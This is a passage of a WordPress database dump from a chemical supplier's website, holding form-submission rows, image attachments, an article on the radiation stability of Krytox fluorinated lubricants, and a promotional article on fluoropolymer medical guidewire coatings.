'1842-revision-v1', '', '', '2017-05-12 13:51:13', '2017-05-12 13:51:13', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4212, 0, '2017-05-12 17:18:08', '2017-05-12 17:18:08', '', '', '', 'publish', 'closed', 'closed', '', '4212', '', '', '2017-05-12 17:18:08', '2017-05-12 17:18:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/4212/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4213, 0, '2017-05-12 18:59:14', '2017-05-12 18:59:14', '', '', '', 'publish', 'closed', 'closed', '', '4213', '', '', '2017-05-12 18:59:14', '2017-05-12 18:59:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4213/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4214, 0, '2017-05-14 07:55:44', '2017-05-14 07:55:44', '', '', '', 'publish', 'closed', 'closed', '', '4214', '', '', '2017-05-14 07:55:44', '2017-05-14 07:55:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4214/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4215, 0, '2017-05-15 14:59:28', '2017-05-15 14:59:28', '', '', '', 'publish', 'closed', 'closed', '', '4215', '', '', '2017-05-15 14:59:28', '2017-05-15 14:59:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/4215/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4216, 0, '2017-05-15 20:00:30', '2017-05-15 20:00:30', '', '', '', 'publish', 'closed', 'closed', '', '4216', '', '', '2017-05-15 20:00:30', '2017-05-15 20:00:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/4216/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4217, 0, '2017-05-15 21:57:49', '2017-05-15 21:57:49', '', '', '', 'publish', 'closed', 'closed', '', '4217', '', '', '2017-05-15 21:57:50', '2017-05-15 21:57:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4217/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4218, 1036, '2017-05-15 23:54:13', '2017-05-15 23:54:13', '', '', '', 'publish', 'closed', 'closed', '', '4218', '', '', '2017-05-15 23:54:13', '2017-05-15 23:54:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/4218/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4219, 2, '2017-05-16 18:20:07', '2017-05-16 18:20:07', '<h3><strong>Radiation Stability of Krytox™ and Fluoroguard™ Polymer Additives</strong></h3>\r\nThe results of some radiation stability exposure data obtained on our <a href="https://www.miller-stephenson.com/product/143ab/">Krytox™ 143AB</a> fluorinated oil and <a href="https://www.miller-stephenson.com/product/krytox-240ab/">Krytox™ 240AB</a> fluorinated grease that contains this oil are summarized in Tables 1–4. It is believed that these data are generally representative of the performance of all Krytox™ oils and greases.\r\n\r\nSamples of oil and grease, in tin-plated screw-cap metal cans, were exposed to a Cobalt-60 source. Rates and total dosages (gamma air equivalent) were varied as indicated, and each data point represents a separate\r\nsample.\r\n\r\nRadiation of these fluoropolymers can result in de-polymerization to volatile or, at least, lower molecular weight fragments. Some of these radiation products would be expected to be acidic. In fact, some evidence\r\nfor corrosion of the metal containers was observed, but it was very minimal and random.\r\n\r\nFollowing the prescribed total dosage exposure, the samples were removed from the radiation field and re-weighed to determine weight losses. These are reported both as a function of total dosage (Table 1) and\r\nas a function of rate (Table 2).\r\n<h4><strong>Table 1. Radiation Stability of Krytox™ 143AB Fluorinated Oil and Krytox™ 240AB Fluorinated Grease Cobalt-60 Source Weight Change versus Total Dose and Dose Rate</strong></h4>\r\n<img class="alignnone  wp-image-4221" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-1.jpg" alt="radiation-stability-lubricant-1" width="1007" height="364" />\r\n<h4><strong>Table 2. Radiation Stability of Krytox™ 143AB Fluorinated Oil and Krytox™ 240AB Fluorinated Grease Cobalt-60 Source Weight Change versus Dose Rate and Total Dose</strong></h4>\r\n<img class="alignnone  wp-image-4223" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-2-1.jpg" alt="radiation-stability-lubricant-2" width="1006" height="364" />\r\n\r\nIn addition to weight change, the viscosity change of radiated Krytox™ 143AB fluorinated oil was measured. These samples were vacuum stripped to remove any “light ends.” The percent viscosity change is summarized in Table 3 for a total dosage of 20 x 106 rad.\r\n\r\nGrease consistency, as determined by penetration measurements, was obtained on the radiated and original grease samples. While there was some minor softening of the grease, it was not considered to be significant and would not be expected to impede its performance. These data are summarized in Table 4.\r\n<h4><strong>Table 3. Radiation Stability of Krytox™—Effect on Viscosity of Krytox™ 143AB Fluorinated Oil Cobalt-60 Source Total Dose 20 x 106 rad*</strong></h4>\r\n<img class="alignnone  wp-image-4224" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-3.jpg" alt="radiation-stability-lubricant-3" width="1001" height="181" />\r\n<h4><strong>Table 4. Radiation Stability of Krytox™—Effect on Consistency of Krytox™ 240AB Fluorinated Grease Cobalt-60 Source</strong></h4>\r\n<img class="alignnone  wp-image-4225" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-5.jpg" alt="radiation-stability-lubricant-5" width="999" height="399" />\r\n\r\nRadiation stability was evaluated in a nuclear reactor at 107 and 108 rad total doses. Only a minor change occurred at 107 rad, while a significant change in viscosity and acidity was observed at 108 rad.\r\n\r\nThe oil was subjected to a mixed dose of gamma as well as thermal and fast neutrons. The exposure in both tests was at the core face of the reactor. A dose of 107 or 108 rad of reactor radiation is probably considerably more severe than the same dose of pure gamma radiation.\r\n\r\nAll Krytox™ PFPE fluorinated oils and Fluoroguard™ polymer additives are chemically identical. They differ in average molecular weight and molecular weight distribution. The property changes shown for Krytox™\r\n143AC, 143AB, and 240AB are believed representative of all Krytox™ fluorinated oils and greases. This would include the 143 series oils, 240 series greases, GPL 10X series oils, the GPL 20X series greases, Fluoroguard™ polymer additive oils—<a href="https://www.miller-stephenson.com/product/fluoroguard-pca/">PCA</a>, <a href="https://www.miller-stephenson.com/product/fluoroguard-sg/">SG</a>, and <a href="https://www.miller-stephenson.com/product/fluoroguard-pro/">PRO</a>, <a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a> grease, <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">XHT series greases</a>, <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Krytox™ 1500 and 1600 series PFPE vacuum pump fluids</a>, <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/fg-corrugator-grease/">Krytox™ FG</a> H-1 rated food oils and greases, K fluids, and other PFPE products.\r\n\r\n<strong>Table 5. Krytox™ 143AC Typical Properties</strong>\r\n\r\n<img class="wp-image-4226 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-6.jpg" alt="radiation-stability-lubricant-6" width="487" height="153" />The Krytox™ 240AB grease consists of a 76 cSt PFPE oil with PTFE thickener. The 143AB oil is 76 cSt and the 143AC oil is 240 cSt at 40 °C (104 °F). For this test, the reactor operating at full power gave a dose of 107 rad in 83 min (at the core face). The thermal neutron flux was 2 x 1012 neutrons/cm2·sec, the fast neutron flux was 1 x 1012 neutrons/cm2·sec, and the gamma dose was 1.6 x 107 R/h.\r\n\r\nFor more information call us or <a href="https://www.miller-stephenson.com/contact/">contact us.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Radiation Stability of Krytox™ and Fluoroguard™ Polymer Additives', '', 'publish', 'closed', 'closed', '', 'radiation-stability-krytox-lubricants-fluoroguard-polymer-additives', '', '', '2017-05-16 18:20:07', '2017-05-16 18:20:07', '', 0, 'https://www.miller-stephenson.com/?p=4219', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (4221, 2, '2017-05-16 17:49:42', '2017-05-16 17:49:42', '', 'radiation-stability-lubricant-1', '', 'inherit', 'closed', 'closed', '', 'radiation-stability-lubricant-1', '', '', '2017-05-16 17:49:53', '2017-05-16 17:49:53', '', 4219, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4222, 2, '2017-05-16 17:52:57', '2017-05-16 17:52:57', '', 'radiation-stability-lubricant-2', '', 'inherit', 'closed', 'closed', '', 'radiation-stability-lubricant-2', '', '', '2017-05-16 17:52:57', '2017-05-16 17:52:57', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4223, 2, '2017-05-16 17:53:23', '2017-05-16 17:53:23', '', 'radiation-stability-lubricant-2', '', 'inherit', 'closed', 'closed', '', 'radiation-stability-lubricant-2-2', '', '', '2017-05-16 17:53:23', '2017-05-16 17:53:23', '', 4219, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-2-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4224, 2, '2017-05-16 17:59:47', '2017-05-16 17:59:47', '', 'radiation-stability-lubricant-3', '', 'inherit', 'closed', 'closed', '', 'radiation-stability-lubricant-3', '', '', '2017-05-16 17:59:47', '2017-05-16 17:59:47', '', 4219, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4225, 2, '2017-05-16 18:03:29', '2017-05-16 18:03:29', '', 'radiation-stability-lubricant-5', '', 'inherit', 'closed', 'closed', '', 'radiation-stability-lubricant-5', '', '', '2017-05-16 18:03:29', '2017-05-16 18:03:29', '', 4219, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-5.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4226, 2, '2017-05-16 18:10:52', '2017-05-16 18:10:52', '', 'radiation-stability-lubricant-6', '', 'inherit', 'closed', 'closed', '', 'radiation-stability-lubricant-6', '', '', '2017-05-16 18:10:52', '2017-05-16 18:10:52', '', 4219, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-6.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4227, 2, '2017-05-16 18:14:04', '2017-05-16 18:14:04', '', 'Radiation Stability Lubricants', 'Lubricants stable in radiation', 'inherit', 'closed', 'closed', '', 'shutterstock_568641832', '', '', '2017-05-16 18:14:31', '2017-05-16 18:14:31', '', 4219, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_568641832.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4228, 2, '2017-05-16 18:20:07', '2017-05-16 18:20:07', '<h3><strong>Radiation Stability of Krytox™ and Fluoroguard™ Polymer Additives</strong></h3>\r\nThe results of some radiation stability exposure data obtained on our <a href="https://www.miller-stephenson.com/product/143ab/">Krytox™ 143AB</a> fluorinated oil and <a href="https://www.miller-stephenson.com/product/krytox-240ab/">Krytox™ 240AB</a> fluorinated grease that contains this oil are summarized in Tables 1–4. It is believed that these data are generally representative of the performance of all Krytox™ oils and greases.\r\n\r\nSamples of oil and grease, in tin-plated screw-cap metal cans, were exposed to a Cobalt-60 source. Rates and total dosages (gamma air equivalent) were varied as indicated, and each data point represents a separate\r\nsample.\r\n\r\nRadiation of these fluoropolymers can result in de-polymerization to volatile or, at least, lower molecular weight fragments. Some of these radiation products would be expected to be acidic. In fact, some evidence\r\nfor corrosion of the metal containers was observed, but it was very minimal and random.\r\n\r\nFollowing the prescribed total dosage exposure, the samples were removed from the radiation field and re-weighed to determine weight losses. These are reported both as a function of total dosage (Table 1) and\r\nas a function of rate (Table 2).\r\n<h4><strong>Table 1. Radiation Stability of Krytox™ 143AB Fluorinated Oil and Krytox™ 240AB Fluorinated Grease Cobalt-60 Source Weight Change versus Total Dose and Dose Rate</strong></h4>\r\n<img class="alignnone  wp-image-4221" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-1.jpg" alt="radiation-stability-lubricant-1" width="1007" height="364" />\r\n<h4><strong>Table 2. Radiation Stability of Krytox™ 143AB Fluorinated Oil and Krytox™ 240AB Fluorinated Grease Cobalt-60 Source Weight Change versus Dose Rate and Total Dose</strong></h4>\r\n<img class="alignnone  wp-image-4223" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-2-1.jpg" alt="radiation-stability-lubricant-2" width="1006" height="364" />\r\n\r\nIn addition to weight change, the viscosity change of radiated Krytox™ 143AB fluorinated oil was measured. These samples were vacuum stripped to remove any “light ends.” The percent viscosity change is summarized in Table 3 for a total dosage of 20 x 106 rad.\r\n\r\nGrease consistency, as determined by penetration measurements, was obtained on the radiated and original grease samples. While there was some minor softening of the grease, it was not considered to be significant and would not be expected to impede its performance. These data are summarized in Table 4.\r\n<h4><strong>Table 3. Radiation Stability of Krytox™—Effect on Viscosity of Krytox™ 143AB Fluorinated Oil Cobalt-60 Source Total Dose 20 x 106 rad*</strong></h4>\r\n<img class="alignnone  wp-image-4224" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-3.jpg" alt="radiation-stability-lubricant-3" width="1001" height="181" />\r\n<h4><strong>Table 4. Radiation Stability of Krytox™—Effect on Consistency of Krytox™ 240AB Fluorinated Grease Cobalt-60 Source</strong></h4>\r\n<img class="alignnone  wp-image-4225" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-5.jpg" alt="radiation-stability-lubricant-5" width="999" height="399" />\r\n\r\nRadiation stability was evaluated in a nuclear reactor at 107 and 108 rad total doses. Only a minor change occurred at 107 rad, while a significant change in viscosity and acidity was observed at 108 rad.\r\n\r\nThe oil was subjected to a mixed dose of gamma as well as thermal and fast neutrons. The exposure in both tests was at the core face of the reactor. A dose of 107 or 108 rad of reactor radiation is probably considerably more severe than the same dose of pure gamma radiation.\r\n\r\nAll Krytox™ PFPE fluorinated oils and Fluoroguard™ polymer additives are chemically identical. They differ in average molecular weight and molecular weight distribution. The property changes shown for Krytox™\r\n143AC, 143AB, and 240AB are believed representative of all Krytox™ fluorinated oils and greases. This would include the 143 series oils, 240 series greases, GPL 10X series oils, the GPL 20X series greases, Fluoroguard™ polymer additive oils—<a href="https://www.miller-stephenson.com/product/fluoroguard-pca/">PCA</a>, <a href="https://www.miller-stephenson.com/product/fluoroguard-sg/">SG</a>, and <a href="https://www.miller-stephenson.com/product/fluoroguard-pro/">PRO</a>, <a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a> grease, <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">XHT series greases</a>, <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Krytox™ 1500 and 1600 series PFPE vacuum pump fluids</a>, <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/fg-corrugator-grease/">Krytox™ FG</a> H-1 rated food oils and greases, K fluids, and other PFPE products.\r\n\r\n<strong>Table 5. Krytox™ 143AC Typical Properties</strong>\r\n\r\n<img class="wp-image-4226 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/Radiation-Stability-Lubricant-6.jpg" alt="radiation-stability-lubricant-6" width="487" height="153" />The Krytox™ 240AB grease consists of a 76 cSt PFPE oil with PTFE thickener. The 143AB oil is 76 cSt and the 143AC oil is 240 cSt at 40 °C (104 °F). For this test, the reactor operating at full power gave a dose of 107 rad in 83 min (at the core face). The thermal neutron flux was 2 x 1012 neutrons/cm2·sec, the fast neutron flux was 1 x 1012 neutrons/cm2·sec, and the gamma dose was 1.6 x 107 R/h.\r\n\r\nFor more information call us or <a href="https://www.miller-stephenson.com/contact/">contact us.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Radiation Stability of Krytox™ and Fluoroguard™ Polymer Additives', '', 'inherit', 'closed', 'closed', '', '4219-revision-v1', '', '', '2017-05-16 18:20:07', '2017-05-16 18:20:07', '', 4219, 'https://www.miller-stephenson.com/4219-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4229, 0, '2017-05-16 20:39:16', '2017-05-16 20:39:16', '', '', '', 'publish', 'closed', 'closed', '', '4229', '', '', '2017-05-16 20:39:16', '2017-05-16 20:39:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/4229/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4230, 0, '2017-05-17 11:04:50', '2017-05-17 11:04:50', '', '', '', 'publish', 'closed', 'closed', '', '4230', '', '', '2017-05-17 11:04:51', '2017-05-17 11:04:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4230/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4231, 0, '2017-05-17 14:01:05', '2017-05-17 14:01:05', '', '', '', 'publish', 'closed', 'closed', '', '4231', '', '', '2017-05-17 14:01:05', '2017-05-17 14:01:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4231/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4232, 0, '2017-05-17 14:42:06', '2017-05-17 14:42:06', '', '', '', 'publish', 'closed', 'closed', '', '4232', '', '', '2017-05-17 14:42:07', '2017-05-17 14:42:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/4232/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4233, 0, '2017-05-17 16:22:32', '2017-05-17 16:22:32', '', '', '', 'publish', 'closed', 'closed', '', '4233', '', '', '2017-05-17 16:22:32', '2017-05-17 16:22:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4233/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4234, 0, '2017-05-17 17:39:21', '2017-05-17 17:39:21', '', '', '', 'publish', 'closed', 'closed', '', '4234', '', '', '2017-05-17 17:39:21', '2017-05-17 17:39:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/4234/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4236, 3, '2017-05-17 18:53:25', '2017-05-17 18:53:25', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufacturers understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guidewires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity and biocompatible nature found exclusively with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection of the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately, Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured, all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection. Our medical coatings have never been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, have developed state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Extremely low coefficient of friction (Tested ASTM 1894)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Passes  ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Passes ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-05-17 18:53:25', '2017-05-17 18:53:25', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4237, 0, '2017-05-17 18:54:31', '2017-05-17 18:54:31', '', '', '', 'publish', 'closed', 'closed', '', '4237', '', '', '2017-05-17 18:54:31', '2017-05-17 18:54:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/4237/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4238, 0, '2017-05-17 20:31:29', '2017-05-17 20:31:29', '', '', '', 'publish', 'closed', 'closed', '', '4238', '', '', '2017-05-17 20:31:30', '2017-05-17 20:31:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/4238/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4239, 0, '2017-05-17 20:31:47', '2017-05-17 20:31:47', '', '', '', 'publish', 'closed', 'closed', '', '4239', '', '', '2017-05-17 20:31:47', '2017-05-17 20:31:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4239/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4240, 0, '2017-05-18 10:06:08', '2017-05-18 10:06:08', '', '', '', 'publish', 'closed', 'closed', '', '4240', '', '', '2017-05-18 10:06:09', '2017-05-18 10:06:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4240/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4241, 0, '2017-05-18 14:44:57', '2017-05-18 14:44:57', '', '', '', 'publish', 'closed', 'closed', '', '4241', '', '', '2017-05-18 14:44:58', '2017-05-18 14:44:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4241/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4242, 0, '2017-05-18 15:14:21', '2017-05-18 15:14:21', '', '', '', 'publish', 'closed', 'closed', '', '4242', '', '', '2017-05-18 15:14:22', '2017-05-18 15:14:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/4242/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4243, 0, '2017-05-18 19:35:09', '2017-05-18 19:35:09', '', '', '', 'publish', 'closed', 'closed', '', '4243', '', '', '2017-05-18 19:35:09', '2017-05-18 19:35:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4243/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4244, 0, '2017-05-19 12:02:09', '2017-05-19 12:02:09', '', '', '', 'publish', 'closed', 'closed', '', '4244', '', '', '2017-05-19 12:02:10', '2017-05-19 12:02:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4244/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4245, 0, '2017-05-19 19:39:43', '2017-05-19 19:39:43', '', '', '', 'publish', 'closed', 'closed', '', '4245', '', '', '2017-05-19 19:39:43', '2017-05-19 19:39:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4245/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4246, 0, '2017-05-19 21:59:56', '2017-05-19 21:59:56', '', '', '', 'publish', 'closed', 'closed', '', '4246', '', '', '2017-05-19 21:59:57', '2017-05-19 21:59:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4246/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4247, 0, '2017-05-20 11:36:51', '2017-05-20 11:36:51', '', '', '', 'publish', 'closed', 'closed', '', '4247', '', '', '2017-05-20 11:36:52', '2017-05-20 11:36:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/4247/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4248, 0, '2017-05-21 01:54:04', '2017-05-21 01:54:04', '', '', '', 'publish', 'closed', 'closed', '', '4248', '', '', '2017-05-21 01:54:04', '2017-05-21 01:54:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/4248/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4249, 0, '2017-05-22 08:36:47', '2017-05-22 08:36:47', '', '', '', 'publish', 'closed', 'closed', '', '4249', '', '', '2017-05-22 08:36:47', '2017-05-22 08:36:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4249/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4250, 0, '2017-05-22 11:48:27', '2017-05-22 11:48:27', '', '', '', 'publish', 'closed', 'closed', '', '4250', '', '', '2017-05-22 11:48:28', '2017-05-22 11:48:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/4250/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4251, 0, '2017-05-22 12:54:10', '2017-05-22 12:54:10', '', '', '', 'publish', 'closed', 'closed', '', '4251', '', '', '2017-05-22 12:54:11', '2017-05-22 12:54:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4251/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4252, 0, '2017-05-22 14:32:36', '2017-05-22 14:32:36', '', '', '', 'publish', 'closed', 'closed', '', '4252', '', '', '2017-05-22 14:32:36', '2017-05-22 14:32:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4252/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4253, 1094, '2017-05-22 17:35:02', '2017-05-22 17:35:02', '', '', '', 'publish', 'closed', 'closed', '', '4253', '', '', '2017-05-22 17:35:03', '2017-05-22 17:35:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/4253/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4254, 0, '2017-05-22 17:37:03', '2017-05-22 17:37:03', '', '', '', 'publish', 'closed', 'closed', '', '4254', '', '', '2017-05-22 17:37:04', '2017-05-22 17:37:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/4254/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4255, 0, '2017-05-22 19:24:29', '2017-05-22 19:24:29', '', '', '', 'publish', 'closed', 'closed', '', '4255', '', '', '2017-05-22 19:24:29', '2017-05-22 19:24:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4255/', 0, 'nf_sub', '', 0); 
